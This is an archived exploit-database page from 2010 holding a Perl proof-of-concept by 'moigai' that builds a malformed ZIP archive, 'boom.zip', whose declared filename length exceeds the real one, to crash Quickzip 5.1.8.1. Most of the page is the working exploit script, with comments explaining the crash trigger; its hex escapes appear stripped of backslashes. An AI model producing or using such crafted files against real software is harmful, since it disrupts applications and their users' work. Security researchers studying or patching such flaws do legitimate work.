Home / os / win7

[dos / poc] - Quickzip 5.1.8.1 Denial of Service Vulnerabili

Posted on 02 November 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Quickzip 5.1.8.1 Denial of Service Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Quickzip 5.1.8.1 Denial of Service Vulnerability by moigai in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================ Quickzip 5.1.8.1 Denial of Service Vulnerability ================================================ # Exploit Title: Quickzip 5.1.8.1 Denial of Service Vulnerability # Date: 2010/11/02 # Author: moigai # e-mail: again.liu@gmail.com # Version: 5.1.8.1 # Tested on: Windows XP SP3 En (VM) # Greetz to: Yoji my $file = &quot;boom.zip&quot;; my $localHeader = &quot;x50x4bx03x04&quot; . #Local file header signature &quot;x00x00x00x00x00x00x00x00x00x00x00x00x00x00&quot; . &quot;x00x00x00x00x00x00x00x00x00x00x00x00&quot;; my $centralDirHeader = &quot;x50x4bx01x02&quot; . #central dir header signature &quot;x14x0bx00x00x00x00x00x00x00x00x00x00x00x00&quot; . &quot;x00x00x00x00x00x00x00x00x00x00&quot; . &quot;x07x00&quot; . #file name length &quot;x00x00x00x00x00x00x01x00x20x00x00x00x00x00&quot; . &quot;x00x00&quot;; # The program crashes when the file name is shorter than the length specified above. # In the case of length specified equals 0x7, the program crash when the actual length is smaller than 0x4 my $filename = &quot;yyy&quot;; my $endCentralDirHeader = &quot;x50x4bx05x06&quot; . #end central dir header signature &quot;x00x00x00x00x01x00x01x00x35x00x00x00x1ex00&quot; . &quot;x00x00x00x00&quot;; my $zip = $localHeader . $centralDirHeader . $filename . $endCentralDirHeader; print &quot; [+] Creating zip file &quot;; open(FILE, &quot;&gt;$file&quot;); print FILE $zip; close(FILE); print &quot;[+] File &quot; . $file . &quot; created &quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-02]</pre></body></html>

 

TOP